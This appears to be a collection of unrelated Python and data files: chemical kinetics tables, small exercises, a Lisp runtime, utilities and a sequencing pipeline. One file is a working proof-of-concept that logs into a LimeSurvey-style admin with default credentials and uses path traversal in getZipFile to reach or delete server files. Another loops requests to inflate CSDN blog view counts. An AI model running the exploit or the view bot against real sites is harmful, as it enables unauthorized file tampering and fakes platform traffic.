kinetics = Arrhenius(A=(136000,'s^-1'), n=1.9199, Ea=(33.0402,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5Hall;Cd_rad_out_singleH;XH_out] for rate rule [R5HJ_1;Cd_rad_out_singleH;O_H_out]
Euclidian distance = 1.41421356237
family: intra_H_migration"""),
)
reaction(
label = 'reaction20',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['[CH2]CC([O])C(C)C=C(20848)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(561575,'s^-1'), n=1.6076, Ea=(35.8025,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R5H_CCC;Y_rad_out;Cs_H_out_2H] for rate rule [R5H_CCC;Cd_rad_out_Cd;Cs_H_out_2H]
Euclidian distance = 3.0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction21',
reactants = ['CC[CH][O](563)', 'C=[C][CH]C(18176)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(7.46075e+06,'m^3/(mol*s)'), n=0.027223, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -14.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction22',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C=C(C)C(O)CC(24957)'],
transitionState = 'TS22',
kinetics = Arrhenius(A=(2.00399e+09,'s^-1'), n=0.37, Ea=(78.2471,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3;Y_rad;XH_Rrad_De] + [R3radExo;Y_rad;XH_Rrad] for rate rule [R3radExo;Y_rad;XH_Rrad_De]
Euclidian distance = 1.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction23',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=CC(C)C(=O)CC(20852)'],
transitionState = 'TS23',
kinetics = Arrhenius(A=(2.6374e+09,'s^-1'), n=0.37, Ea=(88.9686,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R3;Y_rad_De;XH_Rrad] + [R3radExo;Y_rad;XH_Rrad] for rate rule [R3radExo;Y_rad_De;XH_Rrad]
Euclidian distance = 1.0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction24',
reactants = ['CH2(S)(23)', 'C=[C]CC([O])CC(24958)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS24',
kinetics = Arrhenius(A=(143764,'m^3/(mol*s)'), n=0.444, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [carbene;R_H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: 1,2_Insertion_carbene
Ea raised from -5.1 to 0 kJ/mol."""),
)
reaction(
label = 'reaction25',
reactants = ['CH2(S)(23)', 'C=[C]C(C)C(C)[O](19568)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS25',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction26',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C([CH]C)C([O])CC(24176)'],
transitionState = 'TS26',
kinetics = Arrhenius(A=(8.66e+11,'s^-1'), n=0.438, Ea=(94.4747,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 5 used for cCs(-HC)CJ;CdsJ;C
Exact match found for rate rule [cCs(-HC)CJ;CdsJ;C]
Euclidian distance = 0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction27',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C(C)[CH]C([O])CC(24959)'],
transitionState = 'TS27',
kinetics = Arrhenius(A=(6.95888e+10,'s^-1'), n=0.7315, Ea=(144.62,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [cCs(-HC)CJ;CJ;CH3] + [cCs(-HC)CJ;CdsJ;C] for rate rule [cCs(-HC)CJ;CdsJ;CH3]
Euclidian distance = 1.0
family: 1,2_shiftC"""),
)
reaction(
label = 'reaction28',
reactants = ['C=[C]C(C)C([O])CC(20840)'],
products = ['C=C1OC(CC)C1C(24923)'],
transitionState = 'TS28',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;Y_rad_out;Ypri_rad_out] for rate rule [R4_SSS;Y_rad_out;Opri_rad]
Euclidian distance = 1.0
family: Birad_recombination"""),
)
reaction(
label = 'reaction29',
reactants = ['H2CC(41)', 'C[CH]C([O])CC(10592)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS29',
kinetics = Arrhenius(A=(1.06732e+06,'m^3/(mol*s)'), n=0.472793, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [Y_rad;Birad] for rate rule [C_rad/H/NonDeC;Birad]
Euclidian distance = 3.0
family: Birad_R_Recombination
Ea raised from -3.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction30',
reactants = ['O(4)', 'C=[C]C(C)[CH]CC(24265)'],
products = ['C=[C]C(C)C([O])CC(20840)'],
transitionState = 'TS30',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_rad/H/NonDeC;O_birad]
Euclidian distance = 3.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
network(
label = '4254',
isomers = [
'C=[C]C(C)C([O])CC(20840)',
],
reactants = [
('C2H5CHO(70)', 'CH3CHCCH2(18175)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '4254',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
|
from utils.app_setting import APISettings
DEFAULTS = {
'TASK_TITLE_MAX_LENGTH': 30,
'TASK_STATUS_CHOICES': [
(1, 'TODO'),
(2, 'DOING'),
(3, 'DONE'),
],
'TASK_PERMISSIONS': [
'rest_framework.permissions.IsAuthenticated'
]
}
api_settings = APISettings('TODO_API', DEFAULTS)
|
IMP = "INSOMNIA"
for t in xrange(input()):
n = input()
print "Case #" + str(t+1) + ":",
if not n:
print IMP
continue
c = 0
d = [0] * 10
for p in xrange(10**4):
c += n
for m in str(c):
d[int(m)] = 1
if sum(d)==10:
print c
break
if sum(d)<10:
print IMP
|
import requests
import sys
def login(host):
burp0_url = "http://"+host+"/index.php/admin/authentication/sa/login"
burp0_cookies = {"PHPSESSID": "d1f05cefe8bec342c61a93cc722b75e1", "YII_CSRF_TOKEN": "Q1h-QUJKZ2x4a09hR3JmdWQ3eVFFNWxHTmtXX0ZqMHZGaRXh68Lir7Dx9LLsALqnWMWyzp6sbmucRtDTeYVf8w%3D%3D"}
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.1.237:8082", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.237:8082/index.php/admin/authentication/sa/login", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
burp0_data = {"YII_CSRF_TOKEN": "Q1h-QUJKZ2x4a09hR3JmdWQ3eVFFNWxHTmtXX0ZqMHZGaRXh68Lir7Dx9LLsALqnWMWyzp6sbmucRtDTeYVf8w==", "authMethod": "Authdb", "user": "admin", "password": "password", "loginlang": "default", "action": "login", "width": "1536", "login_submit": "login"}
session = requests.session()
res=session.post(burp0_url, headers=burp0_headers,data=burp0_data,verify=False,cookies=burp0_cookies,allow_redirects=False)
#print(res.text)
location=res.headers
phin = requests.utils.dict_from_cookiejar(session.cookies)
burp0_url = "http://"+host+"/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../var/www/html/docs/credits.txt"
burp0_cookies = phin
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.237:8082/index.php/admin/authentication/sa/login", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
result1=r.text
burp0_url = "http://"+host+"/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../var/www/html/docs/credits.txt"
burp0_cookies = phin
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.237:8082/index.php/admin/authentication/sa/login", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
r=requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
result2=r.text
#print(r.text)
#print(r2.status_code)
return result1,result2
def check(result1,host,result2):
# if("Nino Cosic" in result1 and "Nino Cosic" not in result2):
if(result1!='' and result2==''):
print('PoC success!')
return 0
else:
print('PoC failed!')
return -1
if __name__ == "__main__":
host = sys.argv[1]
#host="web"
#host="192.168.56.101:8082"
result=login(host)
result1=result[0]
result2=result[1]
check(result1,host,result2) |
import os
from pythonforandroid.recipes.openssl import OpenSSLRecipe
from pythonforandroid.util import load_source
util = load_source('util', os.path.join(os.path.dirname(os.path.dirname(__file__)), 'util.py'))
assert OpenSSLRecipe.depends == []
assert OpenSSLRecipe.python_depends == []
class OpenSSLRecipePinned(util.InheritedRecipeMixin, OpenSSLRecipe):
url_version = "1.1.1t"
sha512sum = "628676c9c3bc1cf46083d64f61943079f97f0eefd0264042e40a85dbbd988f271bfe01cd1135d22cc3f67a298f1d078041f8f2e97b0da0d93fe172da573da18c"
recipe = OpenSSLRecipePinned()
|
import random, time
randomNum = random.randint(1,10)
game = False
menu = False
computerScore = 0
playerScore = 0
game = 1
while game == 1:
Guess = int(input("Guess a number between 1-10: "))
if Guess == randomNum:
time.sleep(1)
exit(print("Congratz, your right :)"))
playerScore = playerScore + 3
elif Guess > randomNum:
time.sleep(1)
print("You guessed to high number.. Try again please.")
computerScore = computerScore + 1
game = 1
elif Guess < randomNum:
time.sleep(1)
print("You guessed to low.. Try again please.")
computerScore = computerScore + 1
game = 1
else:
print("Something went wrong. Check spelling.")
time.sleep(1)
game = 1 |
"""
The runtime functions like an air traffic controller, knitting
together the various language modules to create a context for running
some code
"""
from __future__ import print_function
import os
import sys
import cmd
import traceback
from io import StringIO
from .dialects.norvig.scope import Scope, add_globals
from .dialects.norvig import eval, InPort, parse
from .dialects.norvig import EOF_OBJECT
from .dialects.norvig.parse import to_string
class Repl(cmd.Cmd):
prompt = "lispy> "
def __init__(self, runtime=None, *args, **kwargs):
self.runtime = runtime
cmd.Cmd.__init__(self, *args, **kwargs)
def default(self, line):
print(self.runtime.eval(line))
class Runtime(object):
"""
Lispy requires a bit of bootstrapping to get going, setting up
special forms from multiple dialects, creating a global scope to
run in, and then calling eval on statements either interactively
or as a part of a script. This class takes care of the creation of
a Runtime
"""
def __init__(self, special_forms=None):
"""
Initialize a runtime context.
special_forms: should be a class that inherits from the dict
module (or just be a dict)
"""
# spcial forms may be passed in, or read from the environment,
# by default they're the norvig combination of default dialects
if special_forms is None:
special_forms = os.environ.get("LISPY_SPECIAL_FORMS_CLASS")
if special_forms is None:
from .dialects.norvig.special_forms import SPECIAL_FORMS
special_forms = SPECIAL_FORMS
self.special_forms = special_forms
self.global_env = add_globals(Scope(), special_forms=special_forms)
def repl(
self,
prompt='lispy> ',
inport=InPort(sys.stdin),
out=sys.stdout,
err=sys.stderr,
return_value=False,
catch_exceptions=True
):
"A prompt-read-eval-print loop."
if out is None:
out = StringIO()
if err is None:
err = StringIO()
while True:
try:
if prompt:
sys.stderr.write(prompt)
x = parse(inport)
if x is EOF_OBJECT:
return
val = eval(x)
if val is not None and out and return_value is False:
err.write(to_string(val) + "\n")
err.flush()
elif return_value:
return val
except Exception as e:
if catch_exceptions:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(
exc_type,
exc_value,
exc_traceback
)
else:
raise e
def read_file(self, file):
"""
grab the individual pieces of code from a file (the complete
s-expressions) and evaluate them syncronously
"""
self.repl(None, InPort(file), None)
def eval(self, expression, out=None, err=None):
"""
Evaluate a string as a lispy program and return its value
"""
# conditionally unicode the expression for python 3 compatibility
if sys.version_info[0] < 3:
expression = unicode(expression)
return self.repl(
None,
InPort(StringIO(expression)),
out,
err,
return_value=True,
catch_exceptions=False
)
|
#! /usr/bin/env python
# itgk oeving 2.3c
import math
a = float(input('skriv inn et tall: '))
b = float(input('skriv inn et tall til: '))
c = float(input('og enda et..: '))
if b**2-4*a*c < 0:
print 'likningen har ingen loesning!'
else:
x = (-b-(math.sqrt(b**2-4*a*c)))/(2*a)
y = (-b+(math.sqrt(b**2-4*a*c)))/(2*a)
if x == y:
print 'likningen fikk en loesning: %d' % x
else:
print 'likningen har 2 gyldige loesninger: %d og %d' % (x,y)
|
"""Binary Search but recursively
This algorithm is a great example of
divide and conquer strategy. The smaller
pieces of the problem is reassembled to
the whole problem.
The recursion occurs on either half of the
list.
"""
def binary_search_rec(a_list, item):
if len(a_list) == 0:
return False
else:
midpoint = len(a_list)//2
if a_list[midpoint] == item:
return True
elif a_list[midpoint] > item:
return binary_search_rec(a_list[:midpoint], item)
else:
return binary_search_rec(a_list[midpoint+1:], item)
test_list = [0, 1, 2, 8, 13, 17, 19, 32, 42]
print(test_list[:1-1])
#print(binary_search_rec(test_list, 3))
#print(binary_search_rec(test_list, 13))
#print(binary_search_rec(test_list, 42)) |
import requests
import time
url = ['https://blog.csdn.net/qq_37745470/article/details/90413713',
'https://blog.csdn.net/qq_37745470/article/details/90270054',
'https://blog.csdn.net/qq_37745470/article/details/90105930',
'https://blog.csdn.net/qq_37745470/article/details/89817088',
'https://blog.csdn.net/qq_37745470/article/details/89601007',
'https://blog.csdn.net/qq_37745470/article/details/89162749',
'https://blog.csdn.net/qq_37745470/article/details/89158633',
'https://blog.csdn.net/qq_37745470/article/details/89145256',
'https://blog.csdn.net/qq_37745470/article/details/89094227',
'https://blog.csdn.net/qq_37745470/article/details/88804768',
'https://blog.csdn.net/qq_37745470/article/details/88778906',
'https://blog.csdn.net/qq_37745470/article/details/88562301',
'https://blog.csdn.net/qq_37745470/article/details/88542926',
'https://blog.csdn.net/qq_37745470/article/details/88233389',
'https://blog.csdn.net/qq_37745470/article/details/88115117',
'https://blog.csdn.net/qq_37745470/article/details/88089724',
'https://blog.csdn.net/qq_37745470/article/details/88087717',
'https://blog.csdn.net/qq_37745470/article/details/88087577',
'https://blog.csdn.net/qq_37745470/article/details/88086713',
'https://blog.csdn.net/qq_37745470/article/details/88082276',
'https://blog.csdn.net/qq_37745470/article/details/88082104',
'https://blog.csdn.net/qq_37745470/article/details/88080260',
'https://blog.csdn.net/qq_37745470/article/details/88078875',
'https://blog.csdn.net/qq_37745470/article/details/88066804',
'https://blog.csdn.net/qq_37745470/article/details/88057059',
'https://blog.csdn.net/qq_37745470/article/details/88046101',
'https://blog.csdn.net/qq_37745470/article/details/88041996',
'https://blog.csdn.net/qq_37745470/article/details/87090547',
'https://blog.csdn.net/qq_37745470/article/details/86770217',
'https://blog.csdn.net/qq_37745470/article/details/86708443',
'https://blog.csdn.net/qq_37745470/article/details/86584836',
'https://blog.csdn.net/qq_37745470/article/details/86575482',
'https://blog.csdn.net/qq_37745470/article/details/86574493',
'https://blog.csdn.net/qq_37745470/article/details/86229781',
'https://blog.csdn.net/qq_37745470/article/details/86150491',
'https://blog.csdn.net/qq_37745470/article/details/85874243',
'https://blog.csdn.net/qq_37745470/article/details/85838104',
'https://blog.csdn.net/qq_37745470/article/details/85108592',
'https://blog.csdn.net/qq_37745470/article/details/84849632',
'https://blog.csdn.net/qq_37745470/article/details/84849617',
'https://blog.csdn.net/qq_37745470/article/details/84849577',
'https://blog.csdn.net/qq_37745470/article/details/84849546',
'https://blog.csdn.net/qq_37745470/article/details/84849512',
'https://blog.csdn.net/qq_37745470/article/details/84849485',
'https://blog.csdn.net/qq_37745470/article/details/84849236',
'https://blog.csdn.net/qq_37745470/article/details/84499273',
'https://blog.csdn.net/qq_37745470/article/details/84499174',
'https://blog.csdn.net/qq_37745470/article/details/84499110',
'https://blog.csdn.net/qq_37745470/article/details/84343758',
'https://blog.csdn.net/qq_37745470/article/details/84331174',
'https://blog.csdn.net/qq_37745470/article/details/84202344',
'https://blog.csdn.net/qq_37745470/article/details/84202315',
'https://blog.csdn.net/qq_37745470/article/details/84202299',
'https://blog.csdn.net/qq_37745470/article/details/84202267',
'https://blog.csdn.net/qq_37745470/article/details/84202244',
'https://blog.csdn.net/qq_37745470/article/details/84202220',
'https://blog.csdn.net/qq_37745470/article/details/84202179',
'https://blog.csdn.net/qq_37745470/article/details/84202113',
'https://blog.csdn.net/qq_37745470/article/details/84202081',
'https://blog.csdn.net/qq_37745470/article/details/83859379',
'https://blog.csdn.net/qq_37745470/article/details/83757100',
'https://blog.csdn.net/qq_37745470/article/details/83717223',
'https://blog.csdn.net/qq_37745470/article/details/83690761',
'https://blog.csdn.net/qq_37745470/article/details/83658508',
'https://blog.csdn.net/qq_37745470/article/details/83653551',
'https://blog.csdn.net/qq_37745470/article/details/83651596',
'https://blog.csdn.net/qq_37745470/article/details/83650390',
'https://blog.csdn.net/qq_37745470/article/details/83591734',
'https://blog.csdn.net/qq_37745470/article/details/83549595',
'https://blog.csdn.net/qq_37745470/article/details/83042124',
'https://blog.csdn.net/qq_37745470/article/details/83041327',
'https://blog.csdn.net/qq_37745470/article/details/83019321',
'https://blog.csdn.net/qq_37745470/article/details/83019187',
'https://blog.csdn.net/qq_37745470/article/details/83019097',
'https://blog.csdn.net/qq_37745470/article/details/83018996',
'https://blog.csdn.net/qq_37745470/article/details/83018678',
'https://blog.csdn.net/qq_37745470/article/details/82557582',
'https://blog.csdn.net/qq_37745470/article/details/81904361',
'https://blog.csdn.net/qq_37745470/article/details/81903943',
'https://blog.csdn.net/qq_37745470/article/details/81903869',
'https://blog.csdn.net/qq_37745470/article/details/81603936',
'https://blog.csdn.net/qq_37745470/article/details/81584901',
'https://blog.csdn.net/qq_37745470/article/details/81584421',
'https://blog.csdn.net/qq_37745470/article/details/81454424',
'https://blog.csdn.net/qq_37745470/article/details/81388488',
'https://blog.csdn.net/qq_37745470/article/details/81260062']
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}
countUrl = len(url)
def access_csdn_url():
count =0
try: # 正常运行
for i in range(countUrl):
response = requests.get(url[i], headers=headers)
if response.status_code == 200:
count = count + 1
print('Success ' + str(count), 'times')
time.sleep(10)
except Exception: # 异常
print('Failed and Retry')
time.sleep(10)
if __name__ == '__main__':
while(1):
access_csdn_url()
|
from numpy.random import randint
import numpy as np
import cv2
import torchvision
import torch
import torch.nn as nn
from PIL import Image
import os
def random_mask(height, width, channels = 3):
img = np.zeros((height, width, channels), np.uint8)
# Set scale
size = int((width + height) * 0.007)
if width < 64 or height < 64:
raise Exception("Width and Height of maks must be at least 64")
# Draw Random Lines
for _ in range(randint(1, 20)):
x1, x2 = randint(1, width), randint(1, width)
y1, y2 = randint(1, height), randint(1, height)
thickness = randint(1, size)
cv2.line(img, (x1, y1), (x2, y2), (1, 1, 1), thickness)
# Draw Random Circles
for _ in range(randint(1, 20)):
x1, y1 = randint(1, width), randint(1, height)
radius = randint(1, size)
cv2.circle(img, (x1, y1), radius, (1, 1, 1), -1)
# Draw Random Ellipses
for _ in range(randint(1, 20)):
x1, y1 = randint(1, width), randint(1, height)
s1, s2 = randint(1, width), randint(1, height)
a1, a2, a3 = randint(1, 180), randint(1, 180), randint(1, 180)
thickness = randint(1, size)
cv2.ellipse(img, (x1, y1), (s1, s2), a1, a2, a3, (1, 1, 1), thickness)
return 1 - img
def save_image_from_dataloader3c(image,imagesavefolder,prefix,indx):
image=image.cpu()
image = torchvision.utils.make_grid(image)
image=(np.transpose(image.numpy().astype(np.float),(1,2,0))+1)/2
image=(image*255).astype(np.uint8)
image_pil=Image.fromarray(image)
image_pil.save(os.path.join(imagesavefolder,f"{prefix}_{indx}.jpg"))
pass |
import argparse
from utils.exper_config import Exper_Config
from models.ops import *
parser = argparse.ArgumentParser()
parser.add_argument("model_config_file",
type=str,
help="yaml file for model config")
parser.add_argument("--run_type",
default="train",
type=str)
parser.add_argument("--resume",
default=False,
type=bool)
parser.add_argument("--resume_step",
default=0,
type=int)
parser.add_argument("--num_epochs",
default=30,
type=int)
parser.add_argument("--batch_size",
default=32,
type=int)
parser.add_argument("--learning_rate",
default=1e-3,
type=float)
parser.add_argument("--rl_lambda",
default=0.0,
type=float)
parser.add_argument("--optimize_for",
default="validity,dc",
type=str)
parser.add_argument("--n_samples",
default=6400,
type=int)
parser.add_argument("--n_critic",
default=5,
type=int)
parser.add_argument("--z_dim",
default=32,
type=int)
parser.add_argument("--log_every",
default=256,
type=int)
parser.add_argument("--val_chkpt_every",
default=2048,
help="this value should be greater than validate_every",
type=int)
parser.add_argument("--dataset",
default="qm9",
type=str)
parser.add_argument("--use_cuda",
default=True,
type=bool)
args = parser.parse_args()
if __name__ == "__main__":
exper_config = Exper_Config(**vars(args))
if args.run_type == "train":
# run all experiments
for model_k in exper_config.model_configs["expers"]:
exper_config.set_curr_exper_name(model_k)
exper_config.set_model_config(model_k)
# run all replicas for a given experiment
for curr_replica_num in enumerate(range(exper_config.total_replica_num)):
# set up model operations for new replica
model_ops = Model_Ops(exper_config)
model_ops.train(args.resume, args.resume_step)
exper_config.increment_replica_num()
|
# -*- coding: utf-8 -*-
# @Time : 2016/9/13 9:51
# @Author : Span
# @Site :
# @File : 5.py
# @Function : http://www.pythonchallenge.com/pc/def/peak.html
# @Software : PyCharm
# @Solution :
import urllib2
#对象序列化以及反序列化dumps() 和 load()
import cPickle as pickle
# 美观打印的结果 such as 用print 输出的是一行数据 但是数据是存在一定结构的 此时用pprint就可以输出多行 更清楚的发现数据的特征
# 作用就是更加美观的打印出数据结构
import pprint
f=urllib2.urlopen('http://www.pythonchallenge.com/pc/def/banner.p')
print type(f)
# Create an unpickler 并且.load()是通过这个文件来unpickler这个对象
result=pickle.Unpickler(f).load()
pprint.pprint(result)
output = open('5.txt', 'w')
for line in result:
print ''.join([c[0]*c[1] for c in line])
output.close() |
def permH(k, res, plus, minus, mul, div):
global MAX, MIN
if k == N - 1:
MAX = max(MAX, res)
MIN = min(MIN, res)
return
if plus:
permH(k + 1, res + nums[k + 1], plus - 1, minus, mul, div)
if minus:
permH(k + 1, res - nums[k + 1], plus, minus - 1, mul, div)
if mul:
permH(k + 1, res * nums[k + 1], plus, minus, mul - 1, div)
if div:
permH(k + 1, int(res / nums[k + 1]), plus, minus, mul, div - 1)
for tc in range(1, int(input()) + 1):
N = int(input())
ops = list(map(int, input().split()))
nums = list(map(int, input().split()))
MIN = 100000000
MAX = -100000000
permH(0, nums[0], *ops)
print('#%d %d' % (tc, MAX - MIN))
|
import sys
import argparse
import os
import glob
import shutil
import datetime
import gzip #potential increase in speed (havne't implement yet)
from mako.template import Template
def process_sample(sdir, fdir):
#pre: it's a PE flowcell
# lane is not considered here
# one sample has one index
today = datetime.date.today().strftime("%Y%m%d")
upload_dir = '/media/KwokRaid02/pipeline-output'
for root, dirs, files in os.walk(sdir):
if 'SampleSheet.csv' in files:
samplesheet = samplesheetReader(os.path.join(root, 'SampleSheet.csv'))
sampleID = samplesheet['SampleID']
sampleID = sampleID.replace('_', '-')
flowcell = samplesheet['FCID']
barcode = samplesheet['Index']
description = sampleID + '_' + samplesheet['Description']
Recipe = samplesheet['Recipe']
projectID = samplesheet['SampleProject']
work_dir = os.path.join(fdir, sampleID)
#add a safe mkdir dir
if not os.path.exists(work_dir):
os.makedirs(work_dir)
if get_fs_freespace(work_dir) < 300*1024*1024*1024:
print "not enough space"
break
r1 = glob.glob(root+"/*R1*")
r2 = glob.glob(root+"/*R2*")
zcat_r1, r1_fastq = generate_zcat_command(r1, work_dir, sampleID, flowcell, 'R1.fastq')
zcat_r2, r2_fastq = generate_zcat_command(r2, work_dir, sampleID, flowcell, 'R2.fastq')
print zcat_r1
print zcat_r2
os.system(zcat_r1)
os.system(zcat_r2)
tmpl= Template(_run_info_template)
run_info = tmpl.render(sampleID=sampleID, today=today, flowcell=projectID, upload_dir=upload_dir, fastq1 = r1_fastq, fastq2=r2_fastq, description=description)
run_info_file = os.path.join(work_dir, sampleID + '_' + flowcell + '_run_info.yaml')
with open(run_info_file, "w") as out_handle:
out_handle.write(run_info)
os.chdir(work_dir)
os.system("bcbio_nextgen.py ~/nextgen-python2.7/bcbio-nextgen/bcbio_system.yaml %s %s -n 4" % (work_dir, run_info_file))
shutil.rmtree(work_dir)
_run_info_template=r"""
fc_date: ${today}
fc_name: ${flowcell}
upload:
dir: ${upload_dir}
details:
- files: [${fastq1}, ${fastq2}]
description: ${description}
analysis: variant
genome_build: GRCh37
algorithm:
aligner: bwa
recalibrate: true
realign: true
variantcaller: gatk
coverage_interval: exome
coverage_depth: high
variant_regions: /home/kwoklab-user/Shared_resources/oligos/Kidney_exome_v4_UTR_custom.GRCh37.bed
hybrid_bait: /home/kwoklab-user/Shared_resources/oligos/Kidney_exome_v4_UTR_custom.GRCh37.bed
hybrid_target: /home/kwoklab-user/Shared_resources/oligos/Kidney_exome_v4_UTR_custom.GRCh37.bed
lane: ${sampleID}
"""
def get_fs_freespace(pathname):
"Get the free space of the filesystem containing pathname"
stat= os.statvfs(pathname)
# use f_bfree for superuser, or f_bavail if filesystem
# has reserved space for superuser
return stat.f_bfree*stat.f_bsize
def generate_zcat_command(files, dest_path, sampleID, flowcell, suffix):
cmd = 'zcat '
final_fastq = dest_path +'/'+ sampleID + '_' + flowcell + '_' + suffix
for file in files:
cmd += file +' '
cmd += ' > ' + final_fastq
return (cmd, final_fastq)
def samplesheetReader(samplesheet):
f = open(samplesheet, "r")
while True:
keys = f.readline().strip().split(',')
values = f.readline().strip().split(',')
break
dictionary = dict(zip(keys, values))
return dictionary
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='concat and decompress fastq files')
parser.add_argument('-i', dest='source', help='fastq source')
parser.add_argument('-o', dest='dest', help='fastq destination', default="/media/KwokRaid01/pipeline_tmp")
options = parser.parse_args()
process_sample(options.source, options.dest)
|
#====================================================================
# obtain the weight of a turboshaft engine, given its max installed
# power "P" in kilowatts. output is a dictionary
#====================================================================
def piston_engine(P): # Power in Kwatts, mass_fuel in kgs
#====================================================================
# get engine weight based on curve fits
#====================================================================
lb2kg = 1.0/2.2 # conversion from lb to kg
P_hp = P/0.746 # power (installed) in Hp
if P_hp <= 4:
w_engine = 14.0 # up to 5 Hp: 14 lb EL-005 engine
elif P_hp <= 20:
w_engine = 14.0/4.0*P_hp
else:
w_engine = 2.3668* (P_hp**0.9155) # engine weight, lbs
m_engine = w_engine*lb2kg
#====================================================================
# use total fuel weight to calculate fuel system handling weight
#====================================================================
return m_engine # weight dictionary [kg]
#====================================================================
# get SFC given flight and atmospheric conditions
# powerReq = engine output required, Pmax = max installed; units=kW
#====================================================================
def getSFC(theta, delta, powerReq, Pmax, KT, KD):
#====================================================================
# calculate sfc base value based on data fits
# base sfc changes with power output of engine - less efficient at lower range
#====================================================================
P_hp = Pmax/0.746
if P_hp <= 4.e0:
sfc_base = 0.42e0
elif P_hp < 56.e0:
sfc_base = -0.0046*P_hp + 0.5935
else:
sfc_base = 0.5185*(P_hp**(-0.09717e0)) # fuel consumption, lb/hp-hr
if sfc_base < 0.3e0:
sfc_base = 0.3e0
if sfc_base > 1.5e0:
sfc_base = 1.5e0
#====================================================================
# get SFC scaling when operating at non-optimal (sub-max) conditions
#====================================================================
x = powerReq/Pmax # power ratio
SFCratio = 0.9526*(x**(-0.256)) # sfc scaling with power rating
#
if SFCratio < 1.0:
SFCratio = 1.0
sfc_base = sfc_base*SFCratio
#====================================================================
